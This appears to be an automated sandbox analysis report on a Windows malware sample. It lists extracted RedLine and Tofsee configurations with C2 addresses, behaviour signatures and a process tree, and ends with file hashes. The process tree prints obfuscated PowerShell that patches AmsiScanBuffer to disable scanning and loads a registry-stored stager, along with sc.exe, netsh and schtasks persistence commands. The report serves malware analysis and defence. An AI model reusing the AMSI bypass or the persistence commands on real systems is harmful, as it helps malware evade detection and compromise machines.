Analysis
-
max time kernel
144s -
max time network
147s -
platform
windows10-1703_x64 -
resource
win10-20220901-en -
resource tags
-
submitted
23-09-2022 12:38
General
-
Target
ab51139e71a05619e6e12989087e4c91d10c7bd06a79a90329ec40e1cfbb8ba4.exe
-
Size
170KB
-
MD5
2ad0b99861723a32a7181b3be56efd0e
-
SHA1
fc8f14bb378616f0bbc2fe601419c97cf178c002
-
SHA256
ab51139e71a05619e6e12989087e4c91d10c7bd06a79a90329ec40e1cfbb8ba4
-
SHA512
56a78e61309137fb57bfd3028cc7e273c1f0e32248eb8f0077b2ad89e6dd943e1fb593a4386b91f7ca468ff49a1fa45a3d304e4f60c795774189e19a5c8baac9
-
SSDEEP
3072:OeoI+YLH75GU6RRjDt2xJmPtPriIKTt+w2ABJd9/PkK4n:F+YLHcUgRPCJyu7TtL
Malware Config
Extracted
tofsee
svartalfheim.top
jotunheim.name
Extracted
redline
5.252.118.34:37991
-
auth_value
b5af0cad45273cbce8023bfa93cf0768
Extracted
redline
LogsDiller Cloud (Sup: @mr_golds)
77.73.134.27:8163
-
auth_value
56c6f7b9024c076f0a96931453da7e56
Extracted
redline
0002
13.72.81.58:13413
-
auth_value
866ce0ed8cfe2be77fb43a4912677698
Signatures
-
DcRat 3 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detects Smokeloader packer 1 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 16 IoCs
-
Modifies Windows Firewall 1 TTPs 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Deletes itself 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 9 IoCs
-
Suspicious use of SetThreadContext 5 IoCs
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 20 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ce6936f1-aa1a-45ea-a5b9-86f39cf423ee}2⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{4e2d4115-921a-4cd0-b3dc-26197fb12f78}2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ab51139e71a05619e6e12989087e4c91d10c7bd06a79a90329ec40e1cfbb8ba4.exe"C:\Users\Admin\AppData\Local\Temp\ab51139e71a05619e6e12989087e4c91d10c7bd06a79a90329ec40e1cfbb8ba4.exe"2⤵
- DcRat
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\347D.exeC:\Users\Admin\AppData\Local\Temp\347D.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\39FD.exeC:\Users\Admin\AppData\Local\Temp\39FD.exe2⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\oojwlwwj\3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\svebdvlo.exe" C:\Windows\SysWOW64\oojwlwwj\3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create oojwlwwj binPath= "C:\Windows\SysWOW64\oojwlwwj\svebdvlo.exe /d\"C:\Users\Admin\AppData\Local\Temp\39FD.exe\"" type= own start= auto DisplayName= "wifi support"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description oojwlwwj "wifi internet conection"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start oojwlwwj3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵
- Modifies Windows Firewall
-
C:\Users\Admin\fwqqbigz.exe"C:\Users\Admin\fwqqbigz.exe" /d"C:\Users\Admin\AppData\Local\Temp\39FD.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wvzxtzar.exe" C:\Windows\SysWOW64\oojwlwwj\4⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config oojwlwwj binPath= "C:\Windows\SysWOW64\oojwlwwj\wvzxtzar.exe /d\"C:\Users\Admin\fwqqbigz.exe\""4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start oojwlwwj4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1702.bat" "4⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul4⤵
- Modifies Windows Firewall
-
C:\Users\Admin\AppData\Local\Temp\4170.exeC:\Users\Admin\AppData\Local\Temp\4170.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5036.exeC:\Users\Admin\AppData\Local\Temp\5036.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Users\Admin\AppData\Local\Temp\syst.exe"C:\Users\Admin\AppData\Local\Temp\syst.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /TN "$77host" /XML "C:\Windows\SysWOW64\$77Host.xml" /f4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /TN "$77host" /XML "C:\Windows\SysWOW64\$77Host.xml" /f5⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\$77Install.exe"C:\Windows\SysWOW64\$77Install.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 79128 -s 22123⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7220 -s 14844⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\5807.exeC:\Users\Admin\AppData\Local\Temp\5807.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgA4AA==3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7A94.exeC:\Users\Admin\AppData\Local\Temp\7A94.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7A94.exeC:\Users\Admin\AppData\Local\Temp\7A94.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\9E1B.exeC:\Users\Admin\AppData\Local\Temp\9E1B.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\GoogleSetup.exe"C:\Users\Admin\AppData\Roaming\GoogleSetup.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Google Update.exe"C:\Users\Admin\AppData\Roaming\Google Update.exe" -l [email protected]5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5872 -s 7483⤵
- Program crash
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4144 -s 7842⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3756 -s 8922⤵
- Program crash
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\sihost.exesihost.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s FontCache1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
C:\Users\Admin\AppData\Roaming\tiaatbdC:\Users\Admin\AppData\Roaming\tiaatbd2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:BmsnDPthQOTp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$GgMrAOfuWcCfNR,[Parameter(Position=1)][Type]$lFZeTpZNgI)$SrORZGOwLHE=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$SrORZGOwLHE.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$GgMrAOfuWcCfNR).SetImplementationFlags('Runtime,Managed');$SrORZGOwLHE.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$lFZeTpZNgI,$GgMrAOfuWcCfNR).SetImplementationFlags('Runtime,Managed');Write-Output $SrORZGOwLHE.CreateType();}$cXnvhCClFNyWV=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$ZOIWyRBomrJBLl=$cXnvhCClFNyWV.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$sbopwGxJnWVkuJItOPj=BmsnDPthQOTp @([String])([IntPtr]);$artoKiAQLzmhpDqSKIcpGp=BmsnDPthQOTp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$fmCMEcipXNy=$cXnvhCClFNyWV.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$dpDjKGYFgvmnyw=$ZOIWyRBomrJBLl.Invoke($Null,@([Object]$fmCMEcipXNy,[Object]('Load'+'LibraryA')));$nHmLxmjVdmyWlbcYl=$ZOIWyRBomrJBLl.Invoke($Null,@([Object]$fmCMEcipXNy,[Object]('Vir'+'tual'+'Pro'+'tect')));$bDSmRQR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dpDjKGYFgvmnyw,$sbopwGxJnWVkuJItOPj).Invoke('a'+'m'+'si.dll');$tmeUMjgvGaIxMvHzk=$ZOIWyRBomrJBLl.Invoke($Null,@([Object]$bDSmRQR,[Object]('Ams'+'iSc'+'an'+'Buffer')));$grOrTEsnId=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nHmLxmjVdmyWlbcYl,$artoKiAQLzmhpDqSKIcpGp).Invoke($tmeUMjgvGaIxMvHzk,[uint32]8,4,[ref]$grOrTEsnId);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$tmeUMjgvGaIxMvHzk,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nHmLxmjVdmyWlbcYl,$artoKiAQLzmhpDqSKIcpGp).Invoke($tmeUMjgvGaIxMvHzk,[uint32]8,0x20,[ref]$grOrTEsnId);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:UNpABAEpbFYJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$raGGKgvxxzLWtP,[Parameter(Position=1)][Type]$InGrJOJhHG)$CMgXuaEKgVG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$CMgXuaEKgVG.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$raGGKgvxxzLWtP).SetImplementationFlags('Runtime,Managed');$CMgXuaEKgVG.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$InGrJOJhHG,$raGGKgvxxzLWtP).SetImplementationFlags('Runtime,Managed');Write-Output $CMgXuaEKgVG.CreateType();}$RXNiarzOyIQjk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$MVJeDdXgFjaDPI=$RXNiarzOyIQjk.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$nQIzZfLOYMzfEYDAihC=UNpABAEpbFYJ @([String])([IntPtr]);$xMuPYiwKcTFcvQUGVnZFGL=UNpABAEpbFYJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mBSVpKlUDPV=$RXNiarzOyIQjk.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$hgrqgnbeIrEgXc=$MVJeDdXgFjaDPI.Invoke($Null,@([Object]$mBSVpKlUDPV,[Object]('Load'+'LibraryA')));$RZvQSOnqiLYguqBnv=$MVJeDdXgFjaDPI.Invoke($Null,@([Object]$mBSVpKlUDPV,[Object]('Vir'+'tual'+'Pro'+'tect')));$SEALFFC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hgrqgnbeIrEgXc,$nQIzZfLOYMzfEYDAihC).Invoke('a'+'m'+'si.dll');$UFQPEGoMoZSJuNodq=$MVJeDdXgFjaDPI.Invoke($Null,@([Object]$SEALFFC,[Object]('Ams'+'iSc'+'an'+'Buffer')));$ntTDifowqh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RZvQSOnqiLYguqBnv,$xMuPYiwKcTFcvQUGVnZFGL).Invoke($UFQPEGoMoZSJuNodq,[uint32]8,4,[ref]$ntTDifowqh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$UFQPEGoMoZSJuNodq,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RZvQSOnqiLYguqBnv,$xMuPYiwKcTFcvQUGVnZFGL).Invoke($UFQPEGoMoZSJuNodq,[uint32]8,0x20,[ref]$ntTDifowqh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC689.tmp.csvFilesize
38KB
MD5dc17cfd22c50bfa060ccdf65ecc68c01
SHA164197c3b0834d8bb63e7ad84f43f226829096465
SHA2569bd2a33effc81870214fa95fe238f71614243cba7933f405d3410bf1793c833c
SHA512d295f4678eb92e036a083b889b002bcfee560c61da13ab73fcf5c1d7711b28457d92955b9a57a8d0ba5e33c512108c1a0a8b6c3bdeac0be7f4ab751d1966af2c
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC6B9.tmp.txtFilesize
12KB
MD5dbee7bc48e87da2517941116e3f17ff7
SHA17eb93646cb91c33e6e92114af2d3c7060921bb91
SHA2569317d059460b8790f53d41f34983680ef82784c8d9394e4b74c6ed7c9e2ad067
SHA512b8c2696c8016e8ca6ecd9601276c7df0867fecef296d33063aa718cb161e5d755f335196145062d8448be869698f94ee8047c0bbcda6806812da88c36201374d
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC6BA.tmp.csvFilesize
38KB
MD590bf7ddc409251ff960d7da7be3ecc67
SHA163a1320b6b0ba491ee5bb80f51ac9fc0daa02169
SHA25617c8da7f3e888c8c8b26047a43cde310b9fd84a43402c15ade4b3c8b73b89baf
SHA5121801aa7a284b35016a2a32bb2304641d9a11da67c7562c48d7612d48d7e74baf69cb2e9620ea8115eb54dc01382bec03fd7eb572aebe6bd29ef39107e0771fa7
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC728.tmp.txtFilesize
12KB
MD58944b3c7898b1763e0ddbc8ed60813ae
SHA118f776da11a8864105488689c362242c9f64c65c
SHA256c9ee74e0c4ceddfb496523b3b971a43dadfd0fe710a411d9b018b9102672bd7d
SHA512a3200718074380c5bfdcdada9e49915a822c5947702b8f3d83d5c51bf4ccee078e91683eaee3065849d3c28cbd0d1ed68dc74b6cd7be2d3f8455ab05b4d87204
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.logFilesize
2KB
MD5950a5d28e7306ee449764f305d2b2cbd
SHA1284712d20f02bf24f1a85accf74579d12f6a8c93
SHA25653511f86dd7a3c1fa14ecb4c61103ec64488f105adc4c0eb475a1d019967d934
SHA512078fbc633072edd2b1240ec87ec1adb81e548a80ee695d676b181c25fe0cc9105e7ad3188ebb14918882d30167a14af13c1767564bcda40616222b050bbe201a
-
C:\Users\Admin\AppData\Local\Temp\1702.batFilesize
150B
MD5e74afcb944e6f3a28fb711481fba79dc
SHA1df0f11fde017b3232cfd1e4ac6423a5b06e942c1
SHA2569df8be77d18f5fdf92949c8d1de1c72a89ba1c3ce1addf060dd6704ca5e0a3a7
SHA512b3200c311c63992061e514697e35157a465efe8e20bc8c7fd04ae53af2d05b68842244dadbeb2ba8b3df0bf283dff7b6514b3dc4cd0d8a2dd65d249918164a05
-
C:\Users\Admin\AppData\Local\Temp\347D.exeFilesize
2.6MB
MD5d5ecc2fd366dbd8d0cd3e9e8c8f5dbd8
SHA1ed7413773b7c9154c9aeed9d173f61577522e0db
SHA256576f224909dc7872b8c5bb4902d177f273c8d680c783454b1d43ad46bed7e983
SHA512858db48785bef29d7d58bf2ff2b7e6c00537e63d2c571741d86ccd293d77abdaa19deab3a68352dae67e650e8da8a20ed7f38e1716af66e589c1c0d58de94bd5
-
C:\Users\Admin\AppData\Local\Temp\347D.exeFilesize
2.6MB
MD5d5ecc2fd366dbd8d0cd3e9e8c8f5dbd8
SHA1ed7413773b7c9154c9aeed9d173f61577522e0db
SHA256576f224909dc7872b8c5bb4902d177f273c8d680c783454b1d43ad46bed7e983
SHA512858db48785bef29d7d58bf2ff2b7e6c00537e63d2c571741d86ccd293d77abdaa19deab3a68352dae67e650e8da8a20ed7f38e1716af66e589c1c0d58de94bd5
-
C:\Users\Admin\AppData\Local\Temp\39FD.exeFilesize
170KB
MD5d80f17936441b4f0cb24509fc8fe36c8
SHA1617fab7dc8e13dd0fff6f44baf87198fc9e0a9e8
SHA256cae0fa6100df0f1fc2f40cc3721440c9c19105f402391aa12c1a19cbe681a9b5
SHA5127e1deee0c1472a83635b85b5ab261b46acf10b34e003bc4c65e48ea7a7af5d90e21be8705a819e820f57fbb4f14cdf65114e7f5fe08fdc753e0cfbb5e50b3d75
-
C:\Users\Admin\AppData\Local\Temp\39FD.exeFilesize
170KB
MD5d80f17936441b4f0cb24509fc8fe36c8
SHA1617fab7dc8e13dd0fff6f44baf87198fc9e0a9e8
SHA256cae0fa6100df0f1fc2f40cc3721440c9c19105f402391aa12c1a19cbe681a9b5
SHA5127e1deee0c1472a83635b85b5ab261b46acf10b34e003bc4c65e48ea7a7af5d90e21be8705a819e820f57fbb4f14cdf65114e7f5fe08fdc753e0cfbb5e50b3d75
-
C:\Users\Admin\AppData\Local\Temp\4170.exeFilesize
395KB
MD5a864c7dcd49506486eb4a15632a34c03
SHA16f247530bd632cb53cdc0b7a8c466e2144c16d84
SHA256dc69e3a17aba90423107dc5915e8a32e76d92aca74323131b36cf9fb144ecdbf
